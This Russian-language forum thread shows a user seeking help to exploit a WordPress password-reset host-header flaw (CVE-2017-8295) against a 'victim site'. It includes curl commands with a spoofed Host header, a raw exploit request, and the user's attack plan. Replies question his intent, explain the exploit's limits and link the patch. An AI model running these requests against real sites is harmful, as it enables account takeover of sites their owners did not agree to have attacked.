Подскажите как воспользоваться уязвимостью Wordpress

Discussion in 'Песочница' started by itprepod, 2 Nov 2017.

  1. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Всем привет.

    Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:

    https://wpvulndb.com/vulnerabilities/8807

    я так понимаю, что это:
    curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

    Команда для терминала в линукс?
    Что должно быть вместо evil.com ?

    вместо example.com сайт жертвы?
    или наоборот?

    Разъясните пожалуйста.
     
  2. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    116
    Likes Received:
    49
    Reputations:
    2
    Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....
    В хелпе curl сказано:
    -H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
     
    itprepod likes this.
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,633
    Likes Received:
    1,246
    Reputations:
    1,555
    cURL кроссплатформенный

    Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
     
    _________________________
    Gorev likes this.
  4. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.

    Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
     
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,633
    Likes Received:
    1,246
    Reputations:
    1,555
    С первой попытки не угадали. Попробуйте еще раз.


    То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
     
    _________________________
  6. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    139
    Likes Received:
    4
    Reputations:
    0
    работа по ру запрещена)
     
  7. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    489
    Likes Received:
    61
    Reputations:
    26
    Это было указанно в описании к уязвимости?))
     
  8. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
     
  9. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?
    Вот здесь:
    https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

    Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com
    Вместо attackers-mxserver.com может быть любой другой домен.
    Но перед атакой получается мне нужно создать почту на домене.
    Порядок действий:
    1. Регаю домен. Пусть будет forhackwp.ru
    2. Делаю почту wordpress@forhackwp.ru
    3. Запускаю Линукс. Пишу в терминал:
    curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword
    4. Жду письма на свою почту: wordpress@forhackwp.ru ?

    Или нет?

    Вот тут:
    https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

    Написано (перевод):

    Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию
    установка, доступная IP-адрес (IP-основе виртуального хоста):

    -----[ HTTP Request ]----

    POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
    Host: injected-attackers-mxserver.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56

    user_login=admin&redirect_to=&wp-submit=Get+New+Password

    ------------------------

    WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.

    Из-за измененного заголовка узла имя_сервера будет присвоено значение
    имя хоста по выбору злоумышленника.
    В результате WordPress передаст следующие заголовки и текст сообщения электронной почты
    /usr/bin / обертка sendmail:

    ------[ полученная электронная почта ]-----

    Subject: [CompanyX WP] Password Reset
    Return-Path: <wordpress@attackers-mxserver.com>
    From: WordPress <wordpress@attackers-mxserver.com>
    Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
    X-Priority: 3
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    Someone requested that the password be reset for the following account:

    http://companyX-wp/wp/wordpress/

    Username: admin

    If this was a mistake, just ignore this email and nothing will happen.

    To reset your password, visit the following address:

    <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

    -------------------------------

    Как сделать HTTP запрос?
     
  10. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    332
    Likes Received:
    511
    Reputations:
    157
    Совета по обновилению WP до последней версии, будет достаточно.

    Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.

    Так же, должны быть соблюдены условия для успешной эксплуатации.

     
  11. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  12. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    332
    Likes Received:
    511
    Reputations:
    157
    Нет.
     
  13. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    написал в личку
     
  14. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    332
    Likes Received:
    511
    Reputations:
    157
    ответил
     
    itprepod likes this.
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,633
    Likes Received:
    1,246
    Reputations:
    1,555
    Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.

    Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
     
    _________________________
    t0ma5 and crlf like this.
  16. itprepod

    itprepod New Member

    Joined:
    2 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да, сайт жертвы на хостинге, как и большинство сайтов по сути.
     
  17. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    332
    Likes Received:
    511
    Reputations:
    157
    Кстати, да. Кривым взлядом, принял патч за обновление :( Кому нужно, можете пропатчиться:

    https://core.trac.wordpress.org/attachment/ticket/25239/CVE-2017-8295.patch
     
Loading...